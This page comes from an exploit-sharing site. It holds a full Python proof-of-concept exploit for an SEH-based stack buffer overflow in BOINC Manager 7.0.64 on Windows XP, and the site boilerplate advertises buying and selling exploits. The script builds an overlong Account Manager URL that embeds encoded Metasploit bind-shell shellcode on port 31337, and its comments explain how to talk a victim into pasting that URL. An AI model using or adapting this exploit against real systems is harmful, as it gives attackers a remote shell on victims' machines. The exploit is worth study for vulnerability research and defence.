0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
BOINC Manager (SETI at Home) version 7.0.64 Field stack based BOF
[# Exploit Title: BOINC Manager 7.0.64 Field stack based buffer overflow
# Date: 26.05.2013
# Exploit Author: xis_one@STM Solutions
# Vendor Homepage: http://boinc.berkeley.edu/
# Software Link: http://boinc.berkeley.edu/dl/boinc_7.0.64_windows_intelx86.exe
# Version: 7.0.64 for Windows
# Tested on: Windows XP SP3 Eng (32bits)
#
#
#BOINC 7.0.64 Windows x86 (used by Seti@HOME) Manager Field stack based buffer overflow - SEH based
#
#BOINC is a program that lets you donate your idle computer time to science projects like
#SETI@home, Climateprediction.net, Rosetta@home, World Community Grid, and many others.
#
#In order to exploit the vulnerability the attacker must convince the victim to use the very long URL as Account Manager URL.
#This URL is generated by the exploit into the exploit.txt file. If it dosnt work on the first time - give it one more try.
#The victim must follow:
#
#Add project -> Use account manager -> Account Manager URL
#
#As with all Field BOF the severity is rather low but hey watch the movie and read below
#
#http://www.youtube.com/watch?v=H9Hz8OPWjtM&feature=youtu.be
#
#Developers team @ berkley.edu was informed about the issue and released the BOINC 7.1.3 version including the fix within a week timeframe.
#windows/shell/bind_tcp EXITFUNC=thread LPORT=31337 R | msfencode -e x86/alpha_upper -t c
shellcode = (
"\x89\xe6\xdb\xdf\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x49\x35\x50"
"\x33\x30\x35\x50\x55\x30\x4c\x49\x4a\x45\x56\x51\x4e\x32\x35"
"\x34\x4c\x4b\x51\x42\x30\x30\x4c\x4b\x31\x42\x44\x4c\x4c\x4b"
"\x56\x32\x32\x34\x4c\x4b\x43\x42\x56\x48\x54\x4f\x4f\x47\x50"
"\x4a\x57\x56\x36\x51\x4b\x4f\x36\x51\x39\x50\x4e\x4c\x47\x4c"
"\x33\x51\x33\x4c\x53\x32\x46\x4c\x47\x50\x39\x51\x38\x4f\x44"
"\x4d\x45\x51\x4f\x37\x4d\x32\x4c\x30\x46\x32\x31\x47\x4c\x4b"
"\x46\x32\x42\x30\x4c\x4b\x30\x42\x47\x4c\x55\x51\x58\x50\x4c"
"\x4b\x31\x50\x34\x38\x4d\x55\x39\x50\x33\x44\x51\x5a\x55\x51"
"\x4e\x30\x50\x50\x4c\x4b\x30\x48\x52\x38\x4c\x4b\x56\x38\x51"
"\x30\x35\x51\x49\x43\x4d\x33\x47\x4c\x37\x39\x4c\x4b\x56\x54"
"\x4c\x4b\x55\x51\x4e\x36\x46\x51\x4b\x4f\x30\x31\x39\x50\x4e"
"\x4c\x49\x51\x38\x4f\x44\x4d\x45\x51\x48\x47\x56\x58\x4d\x30"
"\x44\x35\x5a\x54\x55\x53\x53\x4d\x4b\x48\x57\x4b\x43\x4d\x46"
"\x44\x43\x45\x4d\x32\x46\x38\x4c\x4b\x56\x38\x56\x44\x43\x31"
"\x4e\x33\x35\x36\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x30\x58\x45"
"\x4c\x35\x51\x58\x53\x4c\x4b\x53\x34\x4c\x4b\x35\x51\x38\x50"
"\x4b\x39\x51\x54\x56\x44\x37\x54\x51\x4b\x51\x4b\x33\x51\x56"
"\x39\x31\x4a\x50\x51\x4b\x4f\x4d\x30\x46\x38\x51\x4f\x30\x5a"
"\x4c\x4b\x42\x32\x5a\x4b\x4d\x56\x31\x4d\x45\x38\x47\x43\x57"
"\x42\x45\x50\x33\x30\x45\x38\x54\x37\x54\x33\x46\x52\x31\x4f"
"\x31\x44\x52\x48\x30\x4c\x32\x57\x57\x56\x53\x37\x4b\x4f\x4e"
"\x35\x4f\x48\x5a\x30\x35\x51\x35\x50\x53\x30\x47\x59\x38\x44"
"\x30\x54\x36\x30\x53\x58\x51\x39\x4b\x30\x32\x4b\x43\x30\x4b"
"\x4f\x39\x45\x36\x30\x36\x30\x36\x30\x50\x50\x51\x50\x46\x30"
"\x47\x30\x56\x30\x42\x48\x4b\x5a\x54\x4f\x59\x4f\x4b\x50\x4b"
"\x4f\x59\x45\x4a\x37\x36\x51\x49\x4b\x51\x43\x53\x58\x43\x32"
"\x33\x30\x33\x4a\x55\x39\x4d\x59\x4a\x46\x52\x4a\x42\x30\x36"
"\x36\x30\x57\x42\x48\x38\x42\x59\x4b\x50\x37\x53\x57\x4b\x4f"
"\x39\x45\x30\x53\x50\x57\x55\x38\x4e\x57\x4a\x49\x47\x48\x4b"
"\x4f\x4b\x4f\x59\x45\x46\x33\x56\x33\x50\x57\x52\x48\x43\x44"
"\x5a\x4c\x47\x4b\x4d\x31\x4b\x4f\x38\x55\x30\x57\x4d\x47\x42"
"\x48\x42\x55\x42\x4e\x30\x4d\x35\x31\x4b\x4f\x39\x45\x32\x4a"
"\x53\x30\x43\x5a\x34\x44\x36\x36\x56\x37\x42\x48\x35\x52\x58"
"\x59\x49\x58\x51\x4f\x4b\x4f\x39\x45\x4c\x4b\x36\x56\x32\x4a"
"\x57\x30\x52\x48\x33\x30\x32\x30\x43\x30\x55\x50\x56\x36\x42"
"\x4a\x55\x50\x43\x58\x50\x58\x39\x34\x56\x33\x4d\x35\x4b\x4f"
"\x39\x45\x4a\x33\x56\x33\x43\x5a\x35\x50\x46\x36\x46\x33\x50"
"\x57\x42\x48\x43\x32\x49\x49\x58\x48\x31\x4f\x4b\x4f\x58\x55"
"\x45\x51\x58\x43\x51\x39\x4f\x36\x4c\x45\x5a\x56\x42\x55\x5a"
"\x4c\x58\x43\x41\x41")
urlstart="http://boinc.unex.es/extremadurathome?longurl="
#Pre and Post - play with them to make them look like a valid long URL (some nice examples from google apps are out there)
pre="C"*(1292-46)
nseh="\xEB\x06\x43\x43"
#XP sp 3 32bit Eng 0x018f1d3a : popad # call ebp | {PAGE_READWRITE} space outside of loaded modules to bypass safeseh
NOP="\x43\x43"
seh="\x3a\x1d\x8f\x01"
post="C"*5000
buffer = urlstart + pre + nseh + seh + NOP + shellcode + post
print(buffer)
file = open('exploit.txt','w')
file.write(buffer)
file.close()
# 0day.today [2024-11-16] #